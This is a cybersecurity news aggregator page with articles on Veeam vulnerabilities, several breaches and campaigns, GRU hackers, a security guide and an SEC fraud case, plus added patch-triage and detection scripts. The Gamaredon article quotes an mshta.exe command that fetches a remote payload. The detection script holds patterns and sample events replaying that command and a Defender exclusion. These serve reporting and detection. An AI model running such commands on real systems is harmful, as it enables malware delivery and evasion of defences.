Cyber security aggregate rss news

Cyber security aggregator - feeds history

 Firewall Daily

Veeam has published a new Security Bulletin, KB ID 4649, addressing multiple critical vulnerabilities across its product suite: Veeam Backup & Replication, Veeam ONE, Veeam Service Provider Console, Veeam Agent for Linux, Veeam Backup for Nutanix AHV, and Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization. Several of the issues are rated critical, one of them exploitable without authentication, and the rest are high severity. This article gives a short overview of the bulletin.

Key Highlights from the Veeam Security Bulletin

Here is a product-by-product look at the vulnerabilities and their fixes.

1. Veeam Backup & Replication

Veeam Backup & Replication 12.1.2.172 and earlier are affected by:

CVE-2024-40711: Unauthenticated remote code execution (RCE). Discovered by Florian Hauser of CODE WHITE GmbH. CVSS v3.1 score 9.8 (critical).
CVE-2024-40713: A low-privileged user can alter Multi-Factor Authentication (MFA) settings and thereby bypass MFA. CVSS v3.1 score 8.8.
CVE-2024-40710: A series of related high-severity vulnerabilities allowing RCE under the service account and extraction of sensitive information. CVSS v3.1 score 8.8.
CVE-2024-39718: A low-privileged user can remotely delete files on the system with service account permissions. CVSS v3.1 score 8.1.
CVE-2024-40714: A weakness in TLS certificate validation lets an attacker intercept sensitive credentials during restore operations. CVSS v3.1 score 8.3.
CVE-2024-40712: A path traversal vulnerability permitting local privilege escalation (LPE) for an attacker with low-privileged access. CVSS v3.1 score 7.8.

The fixes are included in Veeam Backup & Replication 12.2 (build 12.2.0.334). Because CVE-2024-40711 needs no credentials, Backup & Replication servers reachable from untrusted networks should be patched first.

2. Veeam Agent for Linux

Veeam Agent for Linux 6.1.2.178 and earlier are affected by:

CVE-2024-40709: Local privilege escalation to root. CVSS v3.1 score 7.8.

The fix is in Veeam Agent for Linux 6.2 (build 6.2.0.101), which ships with Veeam Backup & Replication 12.2.

3. Veeam ONE

Veeam ONE 12.1.0.3208 and earlier are affected by:

CVE-2024-42024: Remote code execution on the Veeam ONE Agent machine for an attacker holding the service account credentials. CVSS v3.1 score 9.1.
CVE-2024-42019: Access to the NTLM hash of the Veeam Reporter Service account; requires user interaction. CVSS v3.1 score 9.0.
CVE-2024-42023: A low-privileged user can remotely execute code with Administrator privileges. CVSS v3.1 score 8.8.
CVE-2024-42021: An attacker with a valid access token can access saved credentials. CVSS v3.1 score 7.5.
CVE-2024-42022: Modification of product configuration files. CVSS v3.1 score 7.5.
CVE-2024-42020: HTML injection in Reporter Widgets. CVSS v3.1 score 7.3.

These are addressed in Veeam ONE 12.2 (build 12.2.0.4093).

4. Veeam Service Provider Console

Veeam Service Provider Console (VSPC) 8.0.0.19552 and earlier are affected by:

CVE-2024-38650: A low-privileged attacker can access the NTLM hash of the service account on the VSPC server. CVSS v3.1 score 9.9 (critical).
CVE-2024-39714: A low-privileged user can upload arbitrary files, leading to RCE on the VSPC server. CVSS v3.1 score 9.9 (critical).
CVE-2024-39715: Like CVE-2024-39714, but via REST API access. CVSS v3.1 score 8.5.
CVE-2024-38651: A low-privileged user can overwrite files, leading to RCE. CVSS v3.1 score 8.5.

The fixes are included in Veeam Service Provider Console 8.1 (build 8.1.0.21377).

5. Veeam Backup for Nutanix AHV and Other Plug-Ins

Veeam Backup for Nutanix AHV Plug-In 12.5.1.8 and earlier, and Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In 12.4.1.45 and earlier, are affected by:

CVE-2024-40718: Local privilege escalation via a server-side request forgery (SSRF) vulnerability. CVSS v3.1 score 8.8.

These are resolved in Veeam Backup for Nutanix AHV Plug-In 12.6.0.632 and Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In 12.5.0.299, both included with Veeam Backup & Replication 12.2.

Conclusion

This Veeam Security Bulletin outlines critical updates and fixes for multiple Veeam products. Users are advised to update Veeam Backup & Replication, Veeam Agent for Linux, Veeam ONE, Veeam Service Provider Console, and the related plug-ins to the fixed builds above. Regular patching and vigilant security practices remain essential in protecting against potential threats and ensuring the integrity of data protection solutions.
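The bulletin gives each product as "version X and earlier" plus a first fixed build, which is exactly what a vulnerability-management check needs. The script below, an added example rather than any tooling from Veeam or the bulletin, compares an inventory against those fixed builds. The fixed build numbers are the ones listed above; the hostnames and the inventory entries are constructed sample data, and the product name strings are assumed to match however your inventory labels them.

```python
"""Triage a host inventory against the first fixed builds in Veeam KB4649.

Added example, not Veeam's own tooling. The fixed builds are the ones in the
bulletin summary above; the inventory at the bottom is constructed sample data.
"""
import re

# Product -> first fixed build from the bulletin; any lower build is affected.
FIXED_BUILDS = {
    "Veeam Backup & Replication": "12.2.0.334",
    "Veeam Agent for Linux": "6.2.0.101",
    "Veeam ONE": "12.2.0.4093",
    "Veeam Service Provider Console": "8.1.0.21377",
    "Veeam Backup for Nutanix AHV Plug-In": "12.6.0.632",
    "Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In": "12.5.0.299",
}


def parse_version(text: str) -> tuple[int, ...]:
    """Turn '12.1.2.172' (or 'v12.1.2.172') into a tuple of ints padded to 4 parts.

    Comparing as integers matters: as strings, '12.10.0.1' sorts before
    '12.2.0.334' because '1' < '2', which would flag a patched host.
    A short version such as '6.2' pads to (6, 2, 0, 0), so it compares as
    older than the fixed build: conservative, and it flags inventories that
    do not record the full build number.
    """
    match = re.fullmatch(r"v?(\d+(?:\.\d+)*)", text.strip())
    if not match:
        raise ValueError(f"unparseable version: {text!r}")
    parts = tuple(int(p) for p in match.group(1).split("."))
    return parts + (0,) * (4 - len(parts))


def is_vulnerable(product: str, installed: str) -> bool:
    """True when the installed build predates the first fixed build."""
    return parse_version(installed) < parse_version(FIXED_BUILDS[product])


def triage(inventory: list[dict]) -> list[dict]:
    """Return one record per host with a verdict and the build to move to."""
    results = []
    for host in inventory:
        product = host["product"]
        if product not in FIXED_BUILDS:
            results.append({**host, "status": "unknown-product"})
            continue
        status = "patch-required" if is_vulnerable(product, host["version"]) else "ok"
        results.append({**host, "status": status, "fixed_build": FIXED_BUILDS[product]})
    return results


# Constructed sample inventory: hostnames are made up, versions are the
# affected and fixed builds from the bulletin plus one incomplete entry.
SAMPLE_INVENTORY = [
    {"host": "vbr01", "product": "Veeam Backup & Replication", "version": "12.1.2.172"},
    {"host": "vbr02", "product": "Veeam Backup & Replication", "version": "12.2.0.334"},
    {"host": "one01", "product": "Veeam ONE", "version": "12.1.0.3208"},
    {"host": "vspc01", "product": "Veeam Service Provider Console", "version": "8.0.0.19552"},
    {"host": "lnx01", "product": "Veeam Agent for Linux", "version": "6.2"},
]

if __name__ == "__main__":
    for rec in triage(SAMPLE_INVENTORY):
        target = rec.get("fixed_build", "-")
        print(f"{rec['host']:8} {rec['version']:12} {rec['status']:15} target {target}")
```

The comparison is done on integer tuples rather than strings on purpose: a lexicographic compare would treat a future 12.10 build as older than 12.2.0.334. Incomplete versions are padded with zeros so that an inventory entry missing the build number is flagged rather than silently passed.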

 Firewall Daily

Tewkesbury Borough Council has declared a major incident following a cyberattack that disrupted its operations on Wednesday afternoon. The attack prompted the council to shut down its systems immediately to contain it. As the investigation unfolds, the council's Chief Executive, Alistair Cunningham, has reassured the public that there is currently no evidence of data being removed or exfiltrated from its systems.

Tewkesbury Borough Council Cyberattack: Immediate Response and Ongoing Investigation

Upon discovering the attack, the council enacted "necessary cyber response steps", including shutting down all systems to prevent further damage. An investigation is ongoing with assistance from the National Cyber Security Centre and the counter-fraud agency. The council has emphasized that there is no indication of personal data being compromised at this time.

In an official statement, the council advised residents and customers to remain vigilant: be cautious of phishing emails and fraudulent activity, use strong and unique passwords, and change passwords promptly if any suspicious activity is detected. It also pointed to further guidance available on the National Cyber Security Centre's website.

Public Communication and Support

In a statement to BBC Radio Gloucestershire, Cunningham said the discovery of unknown user accounts within the council's systems led to the immediate shutdown. He confirmed there was no evidence that data had been removed or exfiltrated, and stressed that the primary focus is on maintaining services for vulnerable residents while the extent of the attack is investigated.

"We have now re-established our phone line and are working on building new computers to expand our phone line capabilities," Cunningham said. Although the council's website remains operational and unaffected, normal services are limited. "I don't want someone who's at risk of losing their house or who can't feed their children not to be able to talk to my staff," he added.

To assist residents, council staff will be available at:
Bishop's Cleeve Parish Council until 15:00 BST
Churchdown police bus at the Tesco car park until 16:00 BST
Brockworth Community Centre, Court Road, until 16:00 BST

Data Protection and Community Assurance

The council has appointed Graeme Simpson as Data Protection Officer to handle inquiries related to the attack. Residents concerned about their data can contact Simpson via the email address given in the council's communication. The council has committed to providing updates and informing residents of any potential risks to their data.

"We do not know the extent of the infiltration of our system," Cunningham admitted, emphasizing that services will not be fully reopened until a thorough assessment is completed. Waste and recycling services remain operational in the meantime.

The Cyber Express reached out to Tewkesbury Borough Council for further details on the attack. As of now, no additional official statements have been provided.

 Hacker News

The decentralized finance (DeFi) ecosystem has been hit by another major security breach. Penpie, a protocol built on the Pendle platform, was hacked on September 3, 2024. The protocol reported that approximately $27 million worth of cryptocurrency was stolen. The Penpie DeFi hack adds to the rising toll of crypto theft, pushing total losses for 2024 past $1.2 billion.

Details of the Penpie DeFi Hack

Penpie's post-mortem report sheds light on the exploit. The attacker leveraged a vulnerability in Penpie's reward distribution mechanism: by deploying a malicious smart contract, described as an "evil market," the attacker inflated their staking balance on the platform and was able to claim a far larger share of rewards than intended, ultimately draining millions of dollars in crypto assets.

Following the hack, Penpie suspended all deposits and withdrawals, halting operations to prevent further losses. The team filed complaints with both the Singapore police and the FBI, and posted a message to the hacker offering a negotiated bounty in exchange for the return of the funds. "We acknowledge your exploit of our protocol," they wrote. "Please contact us to discuss terms confidentially. No legal action will be pursued if the funds are returned. Let's find a mutually beneficial solution."

[Image: Penpie's appeal to the hacker. Source: X]

Euler Finance Cybercriminal Lauds Penpie Hacker

Soon after the incident, reports emerged that the Penpie hacker had moved a significant portion of the stolen funds, around $7 million, through the crypto mixer Tornado Cash. Mixers are designed to obscure the origin and destination of cryptocurrency transactions, which makes them a popular tool for laundering stolen funds.

The Euler Finance hacker, responsible for a $195 million DeFi heist in 2023, then left an on-chain message addressed to the Penpie hacker, praising the decision not to return the stolen funds. "Good job bro. I didn't see a hack like this for a while. I'm happy you kept all the money and didn't let these bastards get back one dollar of what you took. You won, they lost. Good job," they wrote.

[Image: Cybercriminal lauds Penpie hacker. Source: X]

Over 9,000 Victims in August Due to Crypto Phishing Scams: Report

The Penpie incident is one in a series of major DeFi hacks in 2024. The total value of funds stolen in 2024 has surpassed $1.21 billion, a 15.5% increase over the previous year, according to a report by Immunefi. The losses are spread across 154 separate incidents, most of them in DeFi.

August 2024 was particularly costly for crypto investors. Two major attacks during the month resulted in the theft of approximately $238 million in Bitcoin and $55 million in Dai.

[Image: Source: Scam Sniffer report]

Phishing scams also surged in August, with Scam Sniffer reporting a 215% increase in stolen funds compared to the previous month. Over 9,000 victims lost about $63 million, with a single large-scale phishing attack accounting for approximately $55 million of that total.

Regulation and the Future of DeFi

The increasing frequency of DeFi hacks has sparked discussion of potential regulation. Some advocate a more hands-on approach from regulatory bodies; others argue that such measures would stifle innovation and the core principles of DeFi. Finding the right balance between security and innovation remains a challenge. Whatever the regulatory outcome, addressing security vulnerabilities will be essential for fostering long-term trust and stability in the DeFi ecosystem.

 Firewall Daily

In a twist of digital irony, researchers have uncovered an operation that preys on would-be OnlyFans hackers, demonstrating a cybercrime ecosystem that sometimes cannibalizes itself. The malware was distributed as an OnlyFans 'checker' tool. Checker tools test the validity of stolen credentials en masse; this one was laced with the Lumma Stealer malware.

OnlyFans Checker and Lumma Stealer

The OnlyFans checker tool claims to let cybercriminals validate stolen username/password combinations, check account balances, verify whether accounts have payment methods attached, and determine whether accounts have creator privileges. As Veriti's research team found, however, such tools sometimes function as Trojan horses aimed at the very cybercriminals who download and use them.

The researchers note that Lumma Stealer, also known as LummaC2, is not run-of-the-mill malware. It first emerged in August 2022, was developed by the threat actor 'Shamel'/'Lumma', and is offered to the wider cybercriminal audience under a Malware-as-a-Service (MaaS) model. Its technical sophistication, choice of targets, and loader capabilities make it an advanced threat able to adapt its tactics over the course of an operation.

The researchers further noted that the threat actor 'Bilalkhanicom' has launched parallel campaigns targeting cybercriminals who aim to crack Disney+ accounts, Instagram hackers, and even botnet operators. The distributed executables for these campaigns flip the script on unsuspecting criminals. Upon execution, the hidden malware connects to a GitHub account with the username 'UserBesty', created only days earlier, which served as a repository for additional malicious payloads. One of these payloads, 'brtjgjsefd.exe', is designed to embed itself in the target's system and create exclusions in security detection tools, making it harder to detect and remove.

Geopolitical Enigma

In a final twist, the researchers found multiple potential geopolitical links hidden in the malware's architecture, with folder names suggesting East Asian, African, Celtic, and Indigenous Latin American roots:
'Hiyang' and 'Reyung' suggest East Asian connections
'Zuka' suggests African influences
'Lir' suggests Celtic mythology
'Popisaya' suggests Indigenous Latin American roots

The researchers also traced the malware's command-and-control (C2) communications to several newly registered .shop domains, each with a high detection rate. Domains such as caffegclasiqwp(.)shop and ponintnykqwm(.)shop served as C2 servers orchestrating the malware's activity. The researchers describe the campaign as an act of ingenious cyber-deception and a reminder that everyone, even cybercriminals, needs to maintain active security measures.

 Cybersecurity News

The United States and its allies have formally identified a group of Russian hackers, tracked under names such as Cadet Blizzard and Ember Bear, as responsible for large-scale attacks on critical infrastructure in the US and worldwide. These hackers are linked to Unit 29155 of Russia's Main Directorate of the General Staff of the Armed Forces (GRU), a military intelligence unit that has long been under scrutiny for its covert operations.

In a joint advisory released by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the National Security Agency (NSA), it was revealed that the GRU hackers, often junior officers from the GRU's 161st Specialist Training Center, have conducted cyber operations since 2020 under the leadership and oversight of experienced Unit 29155 members. Unit 29155 itself has been tied not only to cyberattacks on critical infrastructure but also to sabotage and assassination attempts across Europe.

WhisperGate Malware and Cyberattacks

The group gained notoriety in January 2022 when it deployed WhisperGate, a data-wiping malware, against Ukrainian organizations. The attacks were part of a broader campaign to destabilize Ukraine and interfere with the efforts of NATO and allied nations to support the country, and they marked a shift from cyber-espionage to outright data destruction. The WhisperGate attacks began on January 13, 2022, and focused on disrupting Ukraine's defense and critical services.

The joint advisory emphasizes that Unit 29155 is distinct from other well-known GRU-affiliated units, such as Units 26165 and 74455, which were responsible for previous cyberattacks in Europe and the U.S. Since early 2022, the group has pivoted toward disrupting aid efforts for Ukraine, expanding its toolkit to blend espionage with destruction. The advisory stresses that the hackers are honing their technical skills and building experience by conducting more advanced cyber operations across various regions.

Unit 29155: A Wide Range of Attacks Across Continents

According to U.S. intelligence, Unit 29155 has been responsible for a wide range of cyberattacks affecting NATO countries and others in North America, Europe, Latin America, and Central Asia. Their tactics have included website defacement, public leaks of stolen data, and extensive infrastructure scanning to uncover vulnerabilities. The targets span multiple sectors, including energy, government services, and financial institutions, leaving critical infrastructure across NATO member states at increasing risk of compromise.

The FBI, which has tracked Unit 29155 closely, has detected more than 14,000 instances of domain scanning across at least 26 NATO members and several European Union (EU) nations. These scans were aimed at identifying weaknesses in critical systems that could be exploited in future attacks.

U.S. Offers Reward for Key GRU Officers

In response, the U.S. State Department announced a reward of up to $10 million for information leading to the identification or location of five Russian military intelligence officers believed to be part of GRU Unit 29155: Vladislav Borovkov, Denis Igorevich Denisenko, Yuriy Denisov, Dmitry Yuryevich Goloshubov, and Nikolay Aleksandrovich Korchagin.

[Image: Source: X]

These officers are accused of carrying out cyber operations that harmed critical U.S. infrastructure, with particular emphasis on the energy, government, and aerospace sectors, and of working to sabotage Western efforts to support Ukraine. In addition to the military officers, a civilian, Amin Timovich Stigal, has also been indicted for his involvement in the WhisperGate attacks against Ukraine. Taken together, these charges highlight the seriousness of Russia's cyber operations and the coordinated effort to bring those responsible to justice.

[Image: Source: X]

Protecting Critical Infrastructure: Recommendations

As Unit 29155 continues its cyber operations, organizations within critical infrastructure sectors are urged to enhance their defenses. Immediate actions recommended by the advisory include:
Patching vulnerabilities in systems to close potential entry points.
Implementing phishing-resistant multifactor authentication (MFA), particularly for webmail and virtual private network (VPN) access.
Segmenting networks to contain malicious activity should an intrusion occur.
These measures matter most for sectors frequently targeted by Russian actors, including energy, transportation, healthcare, and government services.

Global Concerns and Long-Term Implications

Since Russia's invasion of Ukraine in February 2022, cyberattacks have escalated in both scale and severity. Alongside WhisperGate, other destructive tools such as HermeticWiper and ransomware decoys have been used to cripple Ukrainian systems. CISA and the FBI warned early on that such malware could spread beyond Ukraine and affect systems worldwide if defenses were not prepared.

Wednesday's announcement of the U.S. seizing 32 web domains linked to Russian disinformation campaigns underlines the broader cyber and information warfare being waged by Russia. These domains were part of a network aimed at spreading false information to influence the 2024 U.S. presidential election.

Tracking Cyber Threats: Industry and Government Coordination

The cybersecurity industry plays a critical role in identifying and mitigating threats from groups like Unit 29155. Security vendors and government agencies continuously track Russian cyber actors under their own naming conventions, such as Cadet Blizzard (Microsoft) and Ember Bear (CrowdStrike). These groups have demonstrated advanced capabilities in reconnaissance, scanning, and exploiting vulnerabilities in critical systems.

As Unit 29155 continues its operations, the global community remains on high alert. Efforts to strengthen critical infrastructure and improve cyber defenses have never been more important. While the hunt for the GRU officers involved intensifies, the larger challenge remains how to mitigate and defend against the growing cyber threats facing the world today.

 Firewall Daily

A spear-phishing campaign orchestrated by the Gamaredon APT group is targeting Ukrainian military personnel. Cyble Research and Intelligence Labs (CRIL) has detailed the operation, which uses spear-phishing emails to compromise military systems.

Gamaredon, also known as Primitive Bear or Armageddon, is a Russia-affiliated Advanced Persistent Threat (APT) group with a long history of targeting Ukrainian government institutions and critical infrastructure. Active since at least 2013, the group is known for cyber-espionage. Despite the relatively low sophistication of its tools, its persistent focus on specific geopolitical targets has led to numerous successful attacks.

An Overview of the Gamaredon Campaign

The latest campaign reflects an escalation in the group's tactics and scope. CRIL's analysis shows the group using spear-phishing emails to deliver malicious payloads to Ukrainian military personnel in a coordinated, large-scale operation.

[Image: Gamaredon sample observed in the wild (Source: Cyble)]

The spear-phishing emails are designed to deceive recipients into executing malicious files. They are themed around military summons, with subjects such as "ПОВІСТКА" (Ukrainian for "summons"). Each email carries a malicious XHTML attachment that starts a chain of actions when opened.

When the XHTML file is opened, it executes obfuscated JavaScript hidden inside a div element with the id "jwu". The script uses Base64 encoding interspersed with random characters to obscure its purpose and evade detection. It silently writes a RAR archive into the victim's Downloads directory, named to look like a legitimate file. The archive contains a Windows shortcut (LNK) file that, when run, launches mshta.exe against a remote .tar file.

Gamaredon hosts these files using TryCloudflare's one-time tunnel feature, which gives the attackers a temporary, anonymous tunnel for serving payloads without registering infrastructure of their own. The command executed by the LNK file is:

C:\Windows\System32\mshta.exe hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare.com/tcg/instruct/instructor.tar /f

mshta.exe executes HTML Application content regardless of the file's extension, so the .tar name disguises the payload type without changing how it runs.

The Gamaredon Campaign's Scale and Impact

The campaign is notable for its scale and execution. The frequency and volume of spear-phishing emails indicate a highly coordinated effort, and the use of TryCloudflare one-time tunnels shows the group's ingenuity in circumventing traditional infrastructure blocking. A 1-pixel remote image embedded in the malicious files acts as a tracking mechanism, letting the attackers monitor interactions with their phishing content and gauge its effectiveness.

CRIL was unable to retrieve the contents of the .tar files, but analysis by other researchers, such as Cisco Talos, suggests these archives carry additional payloads designed to exfiltrate sensitive information from compromised systems.

Implications for Cybersecurity and Recommendations

To counter spear-phishing attacks of this kind, organizations, particularly in sensitive sectors like the military, should adopt layered defenses:

User training: Teach users to recognize spear-phishing attempts, especially unexpected military-themed attachments or messages. Awareness plays a significant role in reducing the success rate of such attacks.
Advanced email security: Deploy email security with advanced threat protection to filter out phishing emails and malicious attachments.
Anti-malware: Use endpoint protection capable of detecting obfuscated JavaScript and malicious LNK files, and keep it updated and scanning regularly.
Network monitoring: Watch for unusual activity such as connections to *.trycloudflare.com one-time tunnels or other unknown external resources, so anomalies are caught before further infiltration.
Application control: Allow only trusted applications and scripts to run, which blocks execution of unauthorized files such as the LNK stage used here.
Threat intelligence: Block known malicious domains, including those abused by groups like Gamaredon, and stay current with the latest intelligence to counter attacks preemptively.

The Gamaredon campaign represents a significant escalation in cyber threats against Ukrainian military personnel. Through spear-phishing emails, malicious XHTML attachments, and evasion techniques such as TryCloudflare one-time tunnels, Gamaredon continues to refine and intensify its attacks. The persistence and scale of this campaign underline the importance of vigilant, proactive cybersecurity measures.
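Two of the behaviours described on this page are visible in ordinary process-creation telemetry: the Gamaredon LNK stage runs mshta.exe with a URL on a *.trycloudflare.com tunnel, and the Lumma Stealer payload in the OnlyFans checker story adds exclusions to the endpoint security product. The script below is an added example, not tooling from Cyble, Veriti or the campaigns they describe. It runs three simple rules over constructed Sysmon-style JSON events. The hostnames, PIDs and tunnel name are made up, and the Defender `Add-MpPreference -Exclusion*` command line is an assumed concrete form of "creating exclusions against security detection tools", which the report itself does not spell out.

```python
"""Flag process-creation events for behaviours described in the two reports
above: mshta.exe fetching a payload from a TryCloudflare one-time tunnel
(the Gamaredon LNK command) and a payload adding exclusions in the endpoint
security product (the Lumma Stealer campaign).

Added example, not Cyble's or Veriti's tooling. Events are constructed
Sysmon-style JSON lines; only the fields used here are modelled, and the
tunnel hostname is made up rather than the one in the report.
"""
import json
import re

# Rule 1: mshta.exe handed a remote URL. mshta runs HTML Application content
# regardless of the file extension, so a ".tar" URL is still a live payload.
MSHTA_REMOTE = re.compile(r"\bmshta(?:\.exe)?\b.*\bhttps?://", re.I)

# Rule 2: any command line referencing a *.trycloudflare.com tunnel.
TRYCLOUDFLARE = re.compile(r"\b[a-z0-9-]+\.trycloudflare\.com\b", re.I)

# Rule 3: Defender exclusions added from the command line. The report only
# says the payload "creates exclusions against security detection tools";
# Add-MpPreference is an assumed concrete mechanism, not one the report names.
DEFENDER_EXCLUSION = re.compile(
    r"\bAdd-MpPreference\b.*-Exclusion(?:Path|Process|Extension)\b", re.I)

RULES = [
    ("mshta_remote_url", MSHTA_REMOTE),
    ("trycloudflare_tunnel", TRYCLOUDFLARE),
    ("defender_exclusion_added", DEFENDER_EXCLUSION),
]


def evaluate(event: dict) -> list[str]:
    """Return the names of every rule the event's command line matches."""
    cmd = event.get("CommandLine", "")
    return [name for name, rx in RULES if rx.search(cmd)]


def scan(lines: list[str]) -> list[dict]:
    """Run every rule over JSON-lines events and collect the hits."""
    alerts = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        event = json.loads(raw)
        hits = evaluate(event)
        if hits:
            alerts.append({
                "host": event.get("Computer"),
                "pid": event.get("ProcessId"),
                "image": event.get("Image"),
                "rules": hits,
                "cmd": event.get("CommandLine", ""),
            })
    return alerts


# Constructed sample events (hostnames, PIDs and the tunnel name are made up).
SAMPLE_EVENTS = [
    # Gamaredon-style LNK payload: mshta pulling a ".tar" from a one-time tunnel.
    r'{"Computer":"ws01","ProcessId":4120,"Image":"C:\\Windows\\System32\\mshta.exe",'
    r'"CommandLine":"\"C:\\Windows\\System32\\mshta.exe\" '
    r'https://made-up-words-here.trycloudflare.com/tcg/instruct/instructor.tar /f"}',
    # Benign: mshta running a local vendor HTA, no remote URL.
    r'{"Computer":"ws02","ProcessId":5210,"Image":"C:\\Windows\\System32\\mshta.exe",'
    r'"CommandLine":"mshta.exe C:\\Program Files\\Vendor\\setup.hta"}',
    # Lumma-style persistence step: carving a folder out of Defender scans.
    r'{"Computer":"ws03","ProcessId":6630,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",'
    r'"CommandLine":"powershell.exe -NoProfile -Command Add-MpPreference -ExclusionPath C:\\Users\\Public\\brt"}',
    # Benign: ordinary download tool talking to a normal host.
    r'{"Computer":"ws04","ProcessId":7001,"Image":"C:\\Windows\\System32\\curl.exe",'
    r'"CommandLine":"curl.exe -sSL https://example.com/update.json"}',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"{alert['host']} pid={alert['pid']} {','.join(alert['rules'])}: {alert['cmd']}")
```

The mshta rule keys on the combination of the binary and a remote URL rather than on mshta alone, because mshta with a local .hta is common in legitimate software; the tunnel rule fires on any process, since TryCloudflare hostnames rarely appear in a managed environment's command lines. The exclusion rule is deliberately narrow to the assumed Defender cmdlet; other endpoint products need their own pattern.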

 Cyber Essentials

From small businesses to giant corporations, sophisticated cyberattacks are not just prevalent but effective at crippling data and services. To safeguard your business against these threats, you need a holistic approach that combines strong security measures with cyber insurance coverage.

Cybersecurity Threats Explained

The first part of securing your business is knowing the different threats that can come at you. Common threats include:
Phishing Attacks: Criminals pose as trustworthy sources and send deceptive emails to get employees to share sensitive information.
Malware: Software intended to damage or disable computer systems on a network.
Ransomware: Malicious software that encrypts data and extorts a ransom for its release.
Data Breach: Unauthorized access to confidential information, often involving data theft or exposure.
DDoS Attacks: Flooding a service with traffic so it cannot function properly.
Understanding how these threats work is what lets you devise countermeasures and build defenses strong enough that your business is not an easy target.

Steps to Implement Strong Cybersecurity

1. Secure Your Network
Protect your network from unauthorized access with firewalls, encryption, and secure Wi-Fi. Maintain your software and hardware regularly to close the gaps that criminals take advantage of.

2. Strong Password Policies
Enforce password policies that require long, complex passwords, and require a change promptly whenever compromise is suspected; current guidance favors this over forcing changes on a fixed schedule. Enable multi-factor authentication (MFA) for added protection.

3. Regular Software Updates
Keep everything updated, from operating systems to applications. Scheduled updates usually include patches for known security flaws.

4. Employee Training
Train employees in cybersecurity basics: how to identify phishing emails, why not to reuse passwords, and how to handle software applications securely. Short refreshers at the start of other scheduled training keep these habits fresh.

5. Data Encryption
Encrypt all sensitive data in transit and at rest, so that even data captured in transit is unreadable without the decryption key.

6. Backup Data Regularly
Back up your data on an ongoing basis to a secure location. If you suffer a ransomware attack or data breach, offline backups let you restore your information instead of paying to retrieve it.

7. Access Control
Limit exposure to sensitive data with role-based access control and the principle of least privilege: employees get access only to the data their job responsibilities require.

Cyber Security Insurance

However strong your defenses, you also need to plan for failure following a cyberattack. Cyber security insurance, also called cyber liability insurance, helps address this. Policies can cover costs such as:
Data Breach Notification: The costs of notifying affected parties of a data breach.
Legal Fees: The cost of legal representation and of staying in compliance with applicable laws.
Ransom Payments: In a ransomware attack, insurance can contribute to the recovery costs, including any ransom.
Business Interruption: Lost income when a cyberattack shuts down business operations.
Crisis Management: The cost of a public relations plan to manage the aftermath of an incident.

Why is Cyber Security Insurance Needed?

Cyberattacks can lead to huge financial losses. Cyber security insurance acts as a financial backstop so your business can recover without breaking the bank.
Reputation Management: Your business's reputation is at stake after a cyberattack. Insurance may cover public relations work to restore trust with customers and stakeholders.
Peace of Mind: With insurance in place, you can concentrate on the next challenge, such as growth or innovation.

Good engineering and secure coding practices are your first shield against security failures, but even the most knowledgeable team should prepare for what to do if a site or system does get hacked. A clear incident response plan is imperative for dealing with the fallout of a cyberattack. Your plan should include:
Preparation: Create a security team and conduct regular practice sessions.
Detection: Set up monitoring to catch possible intruders.
Containment: Isolate or shut down infected systems immediately to stop the attack from spreading.
Removal: Remove the malware from your network and patch the security holes that let it in.
Recovery: Return to normal operations by restoring systems, applications, and data from backups.
Lessons Learned: Review the incident and what was learned to strengthen defenses against future attacks.

Keeping your company secure in the digital era means implementing comprehensive cybersecurity protocols, training employees, and having cyber security coverage. Knowing what to look out for and how to protect yourself prepares your business for the ever-changing landscape of cyber threats, and cyber security insurance gives you a backup plan in case things don't go as planned.


 Cybersecurity News

The US Securities and Exchange Commission (SEC) has accused a former CIRCOR executive of misleading financial disclosures. The allegations revolve around false statements made regarding the company's finances. This case highlights the importance of accurate and transparent financial reporting.

The U.S. Securities and Exchange Commission (SEC) announced that it has filed fraud charges against Nicholas Bowerman, the former finance director of CIRCOR International Inc., a previously publicly traded technology manufacturer. According to the SEC, Bowerman's fraudulent activities led to misleading financial disclosures by the company from 2019 through 2021, impacting CIRCOR's public financial statements. The SEC also revealed that CIRCOR has settled related internal accounting charges, citing deficiencies in its financial controls that contributed to the situation.

The Allegations Against Bowerman
Bowerman, who was employed at Pipeline Engineering, a U.K.-based business unit of CIRCOR, is accused of engaging in a range of fraudulent practices over two years. The SEC's complaint asserts that between 2019 and 2021, Bowerman manipulated Pipeline Engineering's internal financial records, leading to inaccurate figures being incorporated into CIRCOR's consolidated financial statements. To carry out his fraudulent actions, Bowerman is alleged to have taken multiple deceptive steps, including manipulating account reconciliations, falsifying certifications, fabricating bank confirmation documents, and actively misleading CIRCOR's senior management and external auditors. The SEC claims that these efforts concealed the true financial position of the business unit and resulted in CIRCOR's public financial disclosures overstating its performance by millions of dollars for fiscal years 2019 and 2020, as well as for the nine-month period ending on October 3, 2021.

CIRCOR's Internal Control Failures
In addition to the charges against Bowerman, the SEC's findings also highlight broader issues within CIRCOR's internal accounting systems. According to the SEC's order, the company lacked sufficient internal controls to properly oversee its financial statement preparation, account reconciliation processes, and access to bank accounts. These gaps in oversight allowed Bowerman's fraudulent activities to go undetected for an extended period. The SEC's investigation revealed that CIRCOR's inability to detect Bowerman's misconduct contributed to the company's overstated financial performance during the two-year period in question. The company was found to have violated the federal securities laws' financial reporting, books and records, and internal accounting controls provisions.

CIRCOR's Response and Remedial Measures
In response to the discovery of the fraudulent activities, CIRCOR took immediate action. The company self-reported the financial reporting violations to the SEC shortly after launching its own internal investigation. This proactive cooperation played a significant role in mitigating the SEC's enforcement actions against CIRCOR. The SEC acknowledged CIRCOR's extensive cooperation throughout the investigation, noting that the company provided detailed examples of Bowerman's unauthorized financial adjustments, shared summaries of interviews with witnesses based outside the U.S., and made its employees and external forensic accountants available for questioning. The company also promptly implemented a range of remedial measures to address the identified deficiencies in its internal controls. Key actions taken by CIRCOR included:
Strengthening its internal accounting controls.
Hiring additional experienced finance and accounting personnel.
Cancelling compensation that was scheduled to be paid to a former executive officer.

